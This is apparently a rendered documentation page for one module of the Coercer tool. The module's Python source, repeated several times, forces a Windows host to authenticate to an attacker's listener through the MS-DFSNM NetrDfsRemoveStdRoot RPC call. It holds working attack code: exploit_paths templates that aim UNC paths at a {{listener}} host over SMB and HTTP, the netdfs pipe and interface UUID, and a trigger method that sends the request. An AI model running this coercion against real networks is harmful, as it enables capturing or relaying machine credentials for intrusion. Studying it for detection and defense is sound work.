coercer.methods.MS_DFSNM.NetrDfsRemoveStdRoot

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : NetrDfsRemoveStdRootResponse.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 14 Sep 2022
 6
 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 8from coercer.network.DCERPCSessionError import DCERPCSessionError
 9from coercer.core.utils import gen_random_name
10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
12
13
14class _NetrDfsRemoveStdRoot(NDRCALL):
15    """
16    Structure to make the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol
17    """
18    opnum = 13
19    structure = (
20        ('ServerName', WSTR),  # Type: WCHAR *
21        ('RootShare', WSTR),   # Type: WCHAR *
22        ('ApiFlags', DWORD)    # Type: DWORD
23    )
24
25
26class _NetrDfsRemoveStdRootResponse(NDRCALL):
27    """
28    Structure to parse the response of the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol
29    """
30    structure = ()
31
32
33class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL):
34    """
35    Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)
36
37    Method found by:
38     - [@filip_dragovic](https://twitter.com/filip_dragovic)
39    """
40
41    exploit_paths = [
42        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
43        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
44        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
45        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
46    ]
47
48    access = {
49        "ncan_np": [
50            {
51                "namedpipe": r"\PIPE\netdfs",
52                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
53                "version": "3.0"
54            }
55        ],
56        "ncacn_ip_tcp": [
57            {
58                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
59                "version": "3.0"
60            }
61        ]
62    }
63
64    protocol = {
65        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
66        "shortname": "MS-DFSNM"
67    }
68
69    function = {
70        "name": "NetrDfsRemoveStdRoot",
71        "opnum": 13,
72        "vulnerable_arguments": ["ServerName"]
73    }
74
75    def trigger(self, dcerpc_session, target):
76        if dcerpc_session is not None:
77            try:
78                request = _NetrDfsRemoveStdRoot()
79                request['ServerName'] = self.path
80                request['RootShare'] = gen_random_name() + '\x00'
81                request['ApiFlags'] = 0
82                resp = dcerpc_session.request(request)
83                return ""
84            except Exception as err:
85                return err
86        else:
87            print("[!] Error: dce is None, you must call connect() first.")
88            return None
class NetrDfsRemoveStdRoot(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
34class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL):
35    """
36    Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)
37
38    Method found by:
39     - [@filip_dragovic](https://twitter.com/filip_dragovic)
40    """
41
42    exploit_paths = [
43        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
44        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
45        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
46        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
47    ]
48
49    access = {
50        "ncan_np": [
51            {
52                "namedpipe": r"\PIPE\netdfs",
53                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
54                "version": "3.0"
55            }
56        ],
57        "ncacn_ip_tcp": [
58            {
59                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
60                "version": "3.0"
61            }
62        ]
63    }
64
65    protocol = {
66        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
67        "shortname": "MS-DFSNM"
68    }
69
70    function = {
71        "name": "NetrDfsRemoveStdRoot",
72        "opnum": 13,
73        "vulnerable_arguments": ["ServerName"]
74    }
75
76    def trigger(self, dcerpc_session, target):
77        if dcerpc_session is not None:
78            try:
79                request = _NetrDfsRemoveStdRoot()
80                request['ServerName'] = self.path
81                request['RootShare'] = gen_random_name() + '\x00'
82                request['ApiFlags'] = 0
83                resp = dcerpc_session.request(request)
84                return ""
85            except Exception as err:
86                return err
87        else:
88            print("[!] Error: dce is None, you must call connect() first.")
89            return None

Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

Method found by:

exploit_paths = [('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\netdfs', 'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}], 'ncacn_ip_tcp': [{'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}]}
protocol = {'longname': '[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol', 'shortname': 'MS-DFSNM'}
function = {'name': 'NetrDfsRemoveStdRoot', 'opnum': 13, 'vulnerable_arguments': ['ServerName']}
def trigger(self, dcerpc_session, target):
76    def trigger(self, dcerpc_session, target):
77        if dcerpc_session is not None:
78            try:
79                request = _NetrDfsRemoveStdRoot()
80                request['ServerName'] = self.path
81                request['RootShare'] = gen_random_name() + '\x00'
82                request['ApiFlags'] = 0
83                resp = dcerpc_session.request(request)
84                return ""
85            except Exception as err:
86                return err
87        else:
88            print("[!] Error: dce is None, you must call connect() first.")
89            return None